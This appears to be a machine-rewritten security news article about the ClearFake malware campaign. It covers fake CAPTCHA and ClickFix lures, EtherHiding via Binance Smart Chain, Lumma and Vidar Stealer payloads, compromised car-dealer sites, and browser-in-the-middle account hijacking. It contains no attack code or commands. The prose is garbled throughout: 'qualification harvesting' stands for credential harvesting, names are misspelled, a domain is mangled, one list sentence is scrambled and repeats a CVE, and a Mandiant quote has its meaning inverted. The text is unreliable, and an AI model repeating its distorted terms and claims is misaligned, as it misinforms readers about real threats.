The threat actors behind the Clearfake campaign are using fake Recaptcha or CloudFlare Turnstile validation by tricking users into downloading malware such as Lumma Stealer and Vidar Stealer.
First highlighted in July 2023, ClearFake is the name given to a threat activity cluster that employs fake web browser update baits from compromised WordPress as malware distribution vectors.
The campaign is also known to rely on another technique known as EtherHiding, by utilizing Binance’s Smart Chain (BSC) contract as a way to make the attack chain more resilient. The ultimate goal of these infection chains is to provide information-stolen malware that can target both Windows and MacOS systems.
As of May 2024, Clearfake attacks employ what has come to be known as Clickfix, a social engineering ploy that involves deceiving users to execute malicious Powershell code, pretending to address non-existent technical issues.
“This new Clearfake variant continues to rely on EtherHiding techniques and Clickfix tactics, but has introduced additional interactions with the Binance Smart chain,” Sekoia said in a new analysis.
“By using Smart Contract’s application binary interface, these interactions include downloading, decrypting and displaying Clickfix lures as well as loading multiple JavaScript code and additional resources that fingerprint the victim’s system.”
The latest iterations of the ClearFake framework show an important evolution, employing Web3 features to resist analysis and encrypt ClickFix-related HTML code.
The net result is an updated multi-stage attack sequence that is initiated when the victim visits the compromised site, leading to the acquisition of intermediate JavaScript code from the BSC. The loaded JavaScript is then responsible for getting the system fingerprint and the encrypted Clickfix code hosted on the CloudFlare page.
If the victim pursues and executes a malicious PowerShell command, it leads to the deployment of Emmenhtal Loader (aka Peaklight), which then drops Lumma Stealer.
Sekoia said in late January 2025 he observed an alternative clearfake attack chain that provided a PowerShell loader responsible for installing the Vidar Stealer. As of last month, at least 9,300 websites have been infected with Clearfake.
“Operators update the framework code, lures and distributed payloads daily,” he added. “Running ClearFake relies on multiple data stored in the Binance Smart chain, including JavaScript code, AES keys, Lure HTML files, and Clickfix PowerShell commands.”
“The number of websites compromised by Clearfake suggests that this threat is widely popular and affects many users around the world. In July 2024, […] Approximately 200,000 unique users could be exposed to ClearFake Lurs, which encourages them to download malware. ”
This development was discovered that over 100 car dealer sites have been compromised with Clickfix lures that lead to the deployment of SectoPlat malware.
“The outbreak of this infection at car dealers was not on the dealer’s own website, but on third-party video services, said security researcher Randy McCoin, who detailed some of the early clearfake campaigns in 2023, which described the incident as an example of supply chain attacks.
The video service in question is Les Automotive (“Idostream.”[.]com”), it then removed the malicious JavaScript injection from the site.
The findings are also consistent with the findings of several phishing campaigns designed to push different malware families and carry out qualification harvesting –
Use Virtual Hard Disk (VHD) files to distribute Venom Rat using Windos batch scripts using Microsoft Excel file attachments that take advantage of known security flaws (CVE-2017-0199) to download html application (hta) using a known security flaw (CVE-2017-0199). Leverage misconceptions of Microsoft 365 infrastructure to manage tenants, create new administrative accounts, bypass email security protections, and ultimately provide phishing content that promotes qualification harvesting and account take (ATO)
As social engineering campaigns continue to become more refined, it is essential for organizations and businesses to stay ahead of the curve, and implement robust authentication and access control mechanisms for intermediate (AITM) and browser-in (BITM) techniques that allow attackers to hijack accounts.
“The pivotal benefit of adopting a BITM framework lies in its rapid targeting capabilities, allowing you to reach websites on the web in seconds, minimizing configuration,” Google-owned Mandiant said in a report published this week.
“When an application is targeted via a BITM tool or framework, legitimate sites are provided via an attacker-controlled browser. This distinguishes between legitimate and fake sites that are very challenging for an attacker. From an enemy’s perspective, BITM allows for a simple but effective means of stealing sessions protected by MFA.”
Source link
